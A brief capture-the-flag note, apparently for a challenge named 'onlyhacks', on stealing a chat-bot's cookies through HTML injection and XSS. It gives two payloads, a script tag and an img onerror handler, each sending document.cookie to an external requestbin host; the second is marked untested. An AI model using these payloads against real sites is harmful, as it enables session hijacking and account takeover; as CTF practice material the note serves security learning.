Skip to content

Back

onlyhacks

[!bug] HTML injection | XSS

  • after registration check for html injection
  • need to get cookies from chat-bot via XSS
  • for intercepting request:

[!hint] Payload using script tag: <script>document.location="https://requestbin.whapi.cloud/id?c="+document.cookie</script> or img tag: <img src="x" onerror="fetch('https://requestbin.whapi.cloud/id?cookie='+document.cookie)"/> (not tested)